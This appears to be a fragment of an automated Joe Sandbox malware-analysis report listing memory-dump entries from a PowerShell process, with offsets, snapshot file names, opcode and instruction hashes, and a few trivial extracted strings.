                                                                                                                                  • Source File: 00000000.00000002.1438667242.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac720000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 20cef466d2d3d7db2e701596999bd664edc448b74f6823fe35967b2f38f3e3a6
                                                                                                                                  • Instruction ID: 13cbb1a8ef4e91a1ed73d4ab44ac7b23554a222244cba6c0cccae37b26f9a983
                                                                                                                                  • Opcode Fuzzy Hash: 20cef466d2d3d7db2e701596999bd664edc448b74f6823fe35967b2f38f3e3a6
                                                                                                                                  • Instruction Fuzzy Hash: 61F09A32A0D6488FE768EB1CE8468A873F0FF4632071480F6E04DC7863EA26EC05C780
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6156d114742eb9744de8f202f99af35aeed31ed3c1c5f4a70b868910538c4c04
                                                                                                                                  • Instruction ID: 2ede21fd0b666847a286038f9ce1185fd1802edf901f7b1a1a675e4c35c751cb
                                                                                                                                  • Opcode Fuzzy Hash: 6156d114742eb9744de8f202f99af35aeed31ed3c1c5f4a70b868910538c4c04
                                                                                                                                  • Instruction Fuzzy Hash: 84F0373275C6048FDB4CAA1CF4429B573D1E799324B10457EE48BC2696D917E8868685
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1438667242.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac720000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9cba3bd2ca759baada0a85e4f05f85cfa883aa59767345b0b31c49b8b251b387
                                                                                                                                  • Instruction ID: 8a7cc516d36c6b51c25341b41fc89655ddc742016bb07a69070d68944cb9906c
                                                                                                                                  • Opcode Fuzzy Hash: 9cba3bd2ca759baada0a85e4f05f85cfa883aa59767345b0b31c49b8b251b387
                                                                                                                                  • Instruction Fuzzy Hash: 0BF05E32A4D5448FE758EB5CE445CA877F0EF45320B1540F6E14ECB463EA25EC44C780
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9b771f5cdf1a99f139a12660bfa3386aee9975b906fcd68a6f3102192a98239d
                                                                                                                                  • Instruction ID: 650eb038b1bc0027b3a6f7c1002a2841b12620dec6d60370042a134a29891db7
                                                                                                                                  • Opcode Fuzzy Hash: 9b771f5cdf1a99f139a12660bfa3386aee9975b906fcd68a6f3102192a98239d
                                                                                                                                  • Instruction Fuzzy Hash: 45E09271804B8C8F8B49DF1884594E97FA0FF25205B04029AE40DC7120D7719658CBC1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1437971389.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac6c0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6
                                                                                                                                  • API String ID: 0-1452363761
                                                                                                                                  • Opcode ID: 305038e4ceea68aa292161207716a46ac481b1ffb492bd19d6379c557d139895
                                                                                                                                  • Instruction ID: 31d156273e3654e781a70ab190ab2c5391c815b28d4232e4e0a34337ca2e3108
                                                                                                                                  • Opcode Fuzzy Hash: 305038e4ceea68aa292161207716a46ac481b1ffb492bd19d6379c557d139895
                                                                                                                                  • Instruction Fuzzy Hash: 7D32386290EB898FF7A7DB2898595B53BE1EF9A310F0851BAD04DC7193D918EC09C3D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 65fb7ce404622542eee6366f6eab477797c8d919065b31f5bb5bb1c3d7569329
                                                                                                                                  • Instruction ID: bdd948193232c9539ba4650d0ec99f4fed9a0db9fe6ea82c9e344cd1787be994
                                                                                                                                  • Opcode Fuzzy Hash: 65fb7ce404622542eee6366f6eab477797c8d919065b31f5bb5bb1c3d7569329
                                                                                                                                  • Instruction Fuzzy Hash: A532C652A1F7C6CFF353572858690F57FA0EF53269B0981F7C0D98B093E909A90E83A5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1437971389.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac6c0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e742151a170aa4d704c8547cbcd7435ed50f42a985c0bc9a99c120ce301742c7
                                                                                                                                  • Instruction ID: f706186311805f84763c241074082f949325a2e4e6b8fbea58b98ffc3ff1314c
                                                                                                                                  • Opcode Fuzzy Hash: e742151a170aa4d704c8547cbcd7435ed50f42a985c0bc9a99c120ce301742c7
                                                                                                                                  • Instruction Fuzzy Hash: 9ED1E26190EAC68FF757EB7888155A57FA1EF52220B1891FFE48DCB0A3D91CD809C391
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1437971389.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac6c0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6998d326fb7a3117baa647e17c77b7ac20bf6612acce47b18d0c0f0315626287
                                                                                                                                  • Instruction ID: b478cd6a45cd70c9168e1d3df216ea631efb27f154be802e7016c0bf51402763
                                                                                                                                  • Opcode Fuzzy Hash: 6998d326fb7a3117baa647e17c77b7ac20bf6612acce47b18d0c0f0315626287
                                                                                                                                  • Instruction Fuzzy Hash: 3CD107B291EB868FF797DB2C88591F57BE0EF56310B1461BAD04EC7192DA28DC0987C1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1438207819.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac6e0000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: }$ }$ }$ }$ }$ }
                                                                                                                                  • API String ID: 0-2881616559
                                                                                                                                  • Opcode ID: 90c669aeb64a4e14d81e2415dccd64325b7eeec18fa26167ed105d1eff3b4b7a
                                                                                                                                  • Instruction ID: 5a31dfe268a0de30d49b26a25f4302f469814bc7193539ea0a5c32c6dd9ba07c
                                                                                                                                  • Opcode Fuzzy Hash: 90c669aeb64a4e14d81e2415dccd64325b7eeec18fa26167ed105d1eff3b4b7a
                                                                                                                                  • Instruction Fuzzy Hash: F951C2A6A1E7CA4FE757C76818655716FE19FA3210B19A0FBE08CCA1A3D908D909C3D1